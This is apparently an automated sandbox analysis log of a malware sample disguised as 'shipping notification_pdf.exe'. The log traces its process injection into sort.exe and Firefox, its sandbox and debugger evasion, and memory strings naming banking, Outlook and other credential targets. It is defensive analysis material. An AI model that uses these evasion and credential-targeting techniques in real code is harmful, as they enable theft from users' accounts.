            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeProcess created: C:\Windows\SysWOW64\sort.exe "C:\Windows\SysWOW64\sort.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\sort.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\shipping notification_pdf.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\shipping notification_pdf.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\shipping notification_pdf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\shipping notification_pdf.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\shipping notification_pdf.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\shipping notification_pdf.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\shipping notification_pdf.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\shipping notification_pdf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\shipping notification_pdf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\shipping notification_pdf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\shipping notification_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\shipping notification_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\sort.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: shipping notification_pdf.exeStatic file information: File size 1359839 > 1048576
            Source: Binary string: sort.pdb source: svchost.exe, 00000008.00000003.1508760491.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1549522108.0000000003000000.00000004.00000020.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000A.00000002.3141930342.0000000001098000.00000004.00000020.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000A.00000003.1829074625.00000000010AB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: AVyNLNHPrma.exe, 0000000A.00000002.3134753679.000000000003E000.00000002.00000001.01000000.00000005.sdmp, AVyNLNHPrma.exe, 0000000C.00000000.1614506571.000000000003E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000008.00000002.1549858763.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1440694217.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1438499265.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, sort.exe, 0000000B.00000003.1549372724.000000000370C000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 0000000B.00000002.3145974902.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, sort.exe, 0000000B.00000003.1541316835.000000000352D000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 0000000B.00000002.3145974902.00000000038C0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000008.00000002.1549858763.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1440694217.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1438499265.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, sort.exe, sort.exe, 0000000B.00000003.1549372724.000000000370C000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 0000000B.00000002.3145974902.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, sort.exe, 0000000B.00000003.1541316835.000000000352D000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 0000000B.00000002.3145974902.00000000038C0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: sort.exe, 0000000B.00000002.3146431327.0000000003EEC000.00000004.10000000.00040000.00000000.sdmp, sort.exe, 0000000B.00000002.3137911824.000000000342D000.00000004.00000020.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000002.3145117742.0000000002EDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1911274268.000000003615C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: sort.pdbGCTL source: svchost.exe, 00000008.00000003.1508760491.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1549522108.0000000003000000.00000004.00000020.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000A.00000002.3141930342.0000000001098000.00000004.00000020.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000A.00000003.1829074625.00000000010AB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: sort.exe, 0000000B.00000002.3146431327.0000000003EEC000.00000004.10000000.00040000.00000000.sdmp, sort.exe, 0000000B.00000002.3137911824.000000000342D000.00000004.00000020.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000002.3145117742.0000000002EDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1911274268.000000003615C000.00000004.80000000.00040000.00000000.sdmp
            Source: shipping notification_pdf.exeStatic PE information: real checksum: 0xa961f should be: 0x15b839
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004019DD push esp; retn D083h8_2_004019EA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004180C7 push ebp; ret 8_2_00418091
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004160F4 push edx; ret 8_2_004160F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00418084 push ebp; ret 8_2_00418091
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004160B9 push edx; ret 8_2_004160F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00407173 push 4AC4F0F0h; ret 8_2_0040719B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00416121 push edx; ret 8_2_004160F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00417985 push ds; retf 8_2_00417986
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040A990 push ecx; iretd 8_2_0040A992
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0041E265 push ebp; iretd 8_2_0041E2C6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004032E0 push eax; ret 8_2_004032E2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00413DF7 push es; ret 8_2_00413DF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00401DB2 push esp; iretd 8_2_00401DB3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00413DB5 push es; ret 8_2_00413DF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00401DB5 push esp; iretd 8_2_00401DB3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00401DB5 push ebp; iretd 8_2_00401E31
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0041167E push ebx; ret 8_2_00411690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004186B9 push ecx; ret 8_2_004186CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00418778 push 9D5E7F8Fh; retf 8_2_0041878A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040CFBA push edi; iretd 8_2_0040CFBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036309AD push ecx; mov dword ptr [esp], ecx8_2_036309B6
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_038F09AD push ecx; mov dword ptr [esp], ecx11_2_038F09B6
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F88261 push edx; retf 11_2_02F881C3
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F853D6 push ecx; ret 11_2_02F853EC
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F7E39B push ebx; ret 11_2_02F7E3AD
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F87320 push es; retf 11_2_02F873C5
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F91321 push ebp; ret 11_2_02F91322
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F8D0FB push esi; ret 11_2_02F8D0FC
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F776AD push ecx; iretd 11_2_02F776AF
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F846A2 push ds; retf 11_2_02F846A3
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F85495 push 9D5E7F8Fh; retf 11_2_02F854A7
            Source: C:\Users\user\Desktop\shipping notification_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\shipping notification_pdf.exeAPI/Special instruction interceptor: Address: 433E43C
            Source: C:\Windows\SysWOW64\sort.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
            Source: C:\Windows\SysWOW64\sort.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
            Source: C:\Windows\SysWOW64\sort.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
            Source: C:\Windows\SysWOW64\sort.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
            Source: C:\Windows\SysWOW64\sort.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
            Source: C:\Windows\SysWOW64\sort.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
            Source: C:\Windows\SysWOW64\sort.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
            Source: C:\Windows\SysWOW64\sort.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036AD1C0 rdtsc 8_2_036AD1C0
            Source: C:\Windows\SysWOW64\sort.exeWindow / User API: threadDelayed 9836Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.8 %
            Source: C:\Windows\SysWOW64\sort.exeAPI coverage: 3.1 %
            Source: C:\Windows\SysWOW64\sort.exe TID: 3020Thread sleep count: 135 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\sort.exe TID: 3020Thread sleep time: -270000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\sort.exe TID: 3020Thread sleep count: 9836 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\sort.exe TID: 3020Thread sleep time: -19672000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe TID: 2040Thread sleep time: -50000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe TID: 2040Thread sleep time: -33000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\sort.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F8C040 FindFirstFileW,FindNextFileW,FindClose,11_2_02F8C040
            Source: 30G910fd.11.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
            Source: 30G910fd.11.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
            Source: 30G910fd.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
            Source: 30G910fd.11.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
            Source: 30G910fd.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
            Source: sort.exe, 0000000B.00000002.3148087625.0000000008205000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: entralVMware20,11696492231
            Source: 30G910fd.11.drBinary or memory string: outlook.office.comVMware20,11696492231s
            Source: sort.exe, 0000000B.00000002.3148087625.0000000008205000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,
            Source: 30G910fd.11.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
            Source: 30G910fd.11.drBinary or memory string: AMC password management pageVMware20,11696492231
            Source: sort.exe, 0000000B.00000002.3148087625.0000000008205000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20
            Source: 30G910fd.11.drBinary or memory string: interactivebrokers.comVMware20,11696492231
            Source: 30G910fd.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
            Source: 30G910fd.11.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
            Source: 30G910fd.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
            Source: 30G910fd.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
            Source: 30G910fd.11.drBinary or memory string: outlook.office365.comVMware20,11696492231t
            Source: sort.exe, 0000000B.00000002.3148087625.0000000008205000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kers - non-EU EuropeVMware20,116
            Source: 30G910fd.11.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
            Source: 30G910fd.11.drBinary or memory string: discord.comVMware20,11696492231f
            Source: AVyNLNHPrma.exe, 0000000C.00000002.3144473243.00000000010F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$
            Source: sort.exe, 0000000B.00000002.3148087625.0000000008205000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hdfcbank.comVMware20,11696492231
            Source: sort.exe, 0000000B.00000002.3137911824.000000000342D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9
            Source: sort.exe, 0000000B.00000002.3148087625.0000000008205000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w.interactivebrokers.comVMware20
            Source: 30G910fd.11.drBinary or memory string: global block list test formVMware20,11696492231
            Source: 30G910fd.11.drBinary or memory string: dev.azure.comVMware20,11696492231j
            Source: 30G910fd.11.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
            Source: 30G910fd.11.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
            Source: 30G910fd.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
            Source: 30G910fd.11.drBinary or memory string: bankofamerica.comVMware20,11696492231x
            Source: 30G910fd.11.drBinary or memory string: tasks.office.comVMware20,11696492231o
            Source: sort.exe, 0000000B.00000002.3148087625.0000000008205000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: merica.comVMware20,11696492231|
            Source: sort.exe, 0000000B.00000002.3148087625.0000000008205000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lobal passwords blocklistVMware20,11696492231
            Source: 30G910fd.11.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
            Source: firefox.exe, 0000000E.00000002.1912870961.00000221B61DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 30G910fd.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
            Source: 30G910fd.11.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
            Source: 30G910fd.11.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
            Source: 30G910fd.11.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
            Source: 30G910fd.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
            Source: 30G910fd.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
            Source: 30G910fd.11.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
            Source: C:\Program Files\Mozilla Firefox\firefox.exeAPI call chain: ExitProcess graph end node
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\sort.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036AD1C0 rdtsc 8_2_036AD1C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00417273 LdrLoadDll,8_2_00417273
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036EF367 mov eax, dword ptr fs:[00000030h]8_2_036EF367
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036D437C mov eax, dword ptr fs:[00000030h]8_2_036D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03637370 mov eax, dword ptr fs:[00000030h]8_2_03637370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03637370 mov eax, dword ptr fs:[00000030h]8_2_03637370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03637370 mov eax, dword ptr fs:[00000030h]8_2_03637370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B2349 mov eax, dword ptr fs:[00000030h]8_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B2349 mov eax, dword ptr fs:[00000030h]8_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B2349 mov eax, dword ptr fs:[00000030h]8_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B2349 mov eax, dword ptr fs:[00000030h]8_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B2349 mov eax, dword ptr fs:[00000030h]8_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B2349 mov eax, dword ptr fs:[00000030h]8_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B2349 mov eax, dword ptr fs:[00000030h]8_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B2349 mov eax, dword ptr fs:[00000030h]8_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B2349 mov eax, dword ptr fs:[00000030h]8_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B2349 mov eax, dword ptr fs:[00000030h]8_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B2349 mov eax, dword ptr fs:[00000030h]8_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B2349 mov eax, dword ptr fs:[00000030h]8_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B2349 mov eax, dword ptr fs:[00000030h]8_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B2349 mov eax, dword ptr fs:[00000030h]8_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B2349 mov eax, dword ptr fs:[00000030h]8_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362D34C mov eax, dword ptr fs:[00000030h]8_2_0362D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362D34C mov eax, dword ptr fs:[00000030h]8_2_0362D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03705341 mov eax, dword ptr fs:[00000030h]8_2_03705341
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03629353 mov eax, dword ptr fs:[00000030h]8_2_03629353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03629353 mov eax, dword ptr fs:[00000030h]8_2_03629353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B035C mov eax, dword ptr fs:[00000030h]8_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B035C mov eax, dword ptr fs:[00000030h]8_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B035C mov eax, dword ptr fs:[00000030h]8_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B035C mov ecx, dword ptr fs:[00000030h]8_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B035C mov eax, dword ptr fs:[00000030h]8_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B035C mov eax, dword ptr fs:[00000030h]8_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036FA352 mov eax, dword ptr fs:[00000030h]8_2_036FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F132D mov eax, dword ptr fs:[00000030h]8_2_036F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F132D mov eax, dword ptr fs:[00000030h]8_2_036F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0365F32A mov eax, dword ptr fs:[00000030h]8_2_0365F32A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03627330 mov eax, dword ptr fs:[00000030h]8_2_03627330
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B930B mov eax, dword ptr fs:[00000030h]8_2_036B930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B930B mov eax, dword ptr fs:[00000030h]8_2_036B930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B930B mov eax, dword ptr fs:[00000030h]8_2_036B930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366A30B mov eax, dword ptr fs:[00000030h]8_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366A30B mov eax, dword ptr fs:[00000030h]8_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366A30B mov eax, dword ptr fs:[00000030h]8_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362C310 mov ecx, dword ptr fs:[00000030h]8_2_0362C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03650310 mov ecx, dword ptr fs:[00000030h]8_2_03650310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036EF3E6 mov eax, dword ptr fs:[00000030h]8_2_036EF3E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037053FC mov eax, dword ptr fs:[00000030h]8_2_037053FC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036403E9 mov eax, dword ptr fs:[00000030h]8_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036403E9 mov eax, dword ptr fs:[00000030h]8_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036403E9 mov eax, dword ptr fs:[00000030h]8_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036403E9 mov eax, dword ptr fs:[00000030h]8_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036403E9 mov eax, dword ptr fs:[00000030h]8_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036403E9 mov eax, dword ptr fs:[00000030h]8_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036403E9 mov eax, dword ptr fs:[00000030h]8_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036403E9 mov eax, dword ptr fs:[00000030h]8_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364E3F0 mov eax, dword ptr fs:[00000030h]8_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364E3F0 mov eax, dword ptr fs:[00000030h]8_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364E3F0 mov eax, dword ptr fs:[00000030h]8_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036663FF mov eax, dword ptr fs:[00000030h]8_2_036663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036EC3CD mov eax, dword ptr fs:[00000030h]8_2_036EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0363A3C0 mov eax, dword ptr fs:[00000030h]8_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0363A3C0 mov eax, dword ptr fs:[00000030h]8_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0363A3C0 mov eax, dword ptr fs:[00000030h]8_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0363A3C0 mov eax, dword ptr fs:[00000030h]8_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0363A3C0 mov eax, dword ptr fs:[00000030h]8_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0363A3C0 mov eax, dword ptr fs:[00000030h]8_2_0363A3C0
